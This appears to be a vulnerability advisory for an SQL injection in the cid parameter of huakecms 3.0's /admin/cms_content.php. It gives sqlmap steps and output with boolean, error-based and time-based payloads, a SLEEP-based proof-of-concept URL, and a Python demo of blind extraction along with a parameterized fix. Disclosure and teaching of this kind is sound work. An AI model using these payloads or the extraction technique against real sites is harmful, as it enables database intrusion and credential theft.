华科网站管理系统免费版3.0 (huakecms free version 3.0) is website-building software written in PHP. The vendor describes it as having a novel, attractive interface; it is a CMS (content management system) aimed at small and medium-sized enterprises. The barrier to use is low: no professional computer knowledge is required, all operation and management happen in the back end, and the software is simple to operate yet powerful, with strong extensibility to suit the needs of different industries.
[Suggested description]
huakecms free version 3.0 was found to contain a SQL injection vulnerability in /admin/cms_content.php (cid parameter).
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
http://www.huakecms.com/
[Affected Product Code Base]
huakecms free version Dev 3.0
[Affected Component]
File: /admin/cms_content.php
Parameter: cid
[Attack Type]
Remote
[Vulnerability demonstration]
1. After logging in with an administrator account, access
http://localhost:8081/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1*
and capture the request with Burp Suite (the trailing "*" marks the injection point for sqlmap).
2. Copy the captured request into a text file "sql.txt" in the sqlmap directory. The system uses fairly complex cookie and session authentication, so even though this is a GET-based injection, feeding sqlmap the full captured request (including its cookies) is recommended to improve the success rate.
3. Run the command
python sqlmap.py -r sql.txt --current-db --risk=3 --level=5
When the scan completes, sqlmap reports that the cid parameter is injectable and retrieves the name of the current database:
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://localhost:8081/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND 5655=5655

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://localhost:8081/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 OR (SELECT 2163 FROM(SELECT COUNT(*),CONCAT(0x71626a7871,(SELECT (ELT(2163=2163,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://localhost:8081/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 2134 FROM (SELECT(SLEEP(5)))xZJI)
[Cause of vulnerability]
1. In /admin/cms_content.php, when $_GET['search'] is set and $_GET['cid'] is not 0, execution reaches get_channel($_GET['cid'],'n_child').') , so the raw cid value from the request is passed straight into get_channel().
2. get_channel() is defined in /system/config.php. Its SQL statements embed the value without wrapping it in single quotes (and without casting it to an integer).
3. Inside get_channel(), $t0 holds the value of $_GET['cid'], which is attacker-controlled, so both time-based blind and boolean-based blind SQL injection are possible.
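To make the root cause concrete, here is an added example that is not huakecms code: it reproduces the pattern in Python against an in-memory SQLite database, with a stand-in for get_channel() that concatenates the unquoted cid value into its query, a boolean-based blind extraction driven through that query (the technique behind sqlmap's "AND boolean-based blind" finding), and the hardened form that casts and binds the value. The table layout, column names and rows are constructed assumptions. SQLite has no SLEEP(), so the time-based variant is not reproduced; on MySQL the character probe would use ORD(MID(...)) instead of unicode(substr(...)).

```python
import sqlite3


def make_db():
    """Constructed sample database; the schema and rows are assumptions for
    the demonstration, not the real huakecms schema."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE channel (id INTEGER PRIMARY KEY, parent INTEGER, name TEXT);
        INSERT INTO channel VALUES (1, 0, 'news'), (2, 1, 'local'),
                                   (3, 1, 'world'), (4, 0, 'about');
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'hunter2');
    """)
    return con


def get_channel_vulnerable(con, cid):
    """Stand-in for the unquoted pattern the advisory describes: the request
    value ($t0 in the original) is concatenated into the SQL text with no
    quotes and no cast, so 'cid=1 AND <condition>' becomes part of WHERE."""
    sql = "SELECT id FROM channel WHERE parent=" + str(cid) + " ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def get_channel_hardened(con, cid):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter instead of building SQL by concatenation.
    The PHP equivalent is intval() on the input plus a prepared statement."""
    cid = int(cid)  # raises ValueError for '1 AND 1=0'
    return [row[0] for row in con.execute(
        "SELECT id FROM channel WHERE parent=? ORDER BY id", (cid,))]


def hardened_rejects(con, cid):
    """True if the hardened function refuses the value."""
    try:
        get_channel_hardened(con, cid)
    except ValueError:
        return True
    return False


def blind_extract(con, subquery, maxlen=32):
    """Boolean-based blind extraction through the vulnerable builder.
    Each probe asks 'is character <pos> of the secret equal to <ch>?' and
    reads the answer from whether the child-channel list comes back empty."""
    secret = ""
    for pos in range(1, maxlen + 1):
        matched = None
        for ch in range(32, 127):  # printable ASCII
            probe = f"1 AND unicode(substr(({subquery}),{pos},1))={ch}"
            if get_channel_vulnerable(con, probe):
                matched = chr(ch)
                break
        if matched is None:  # past the end: substr() is '' and unicode('') is NULL
            break
        secret += matched
    return secret


if __name__ == "__main__":
    db = make_db()
    print(get_channel_vulnerable(db, "1"))           # legitimate use
    print(get_channel_vulnerable(db, "1 AND 1=0"))   # injected condition empties the result
    print(blind_extract(db, "SELECT username FROM admin WHERE id=1"))
    print(hardened_rejects(db, "1 AND 1=0"))
```

The extraction loop is the same logic sqlmap automates: one request per candidate character, with the true/false answer carried by the page content rather than by an error message or a delay. The hardened builder makes the whole class of payloads impossible, because the value never reaches the SQL text as a string.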
[poc]
http://localhost:8086/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 3158 FROM (SELECT(SLEEP(5)))YkeQ)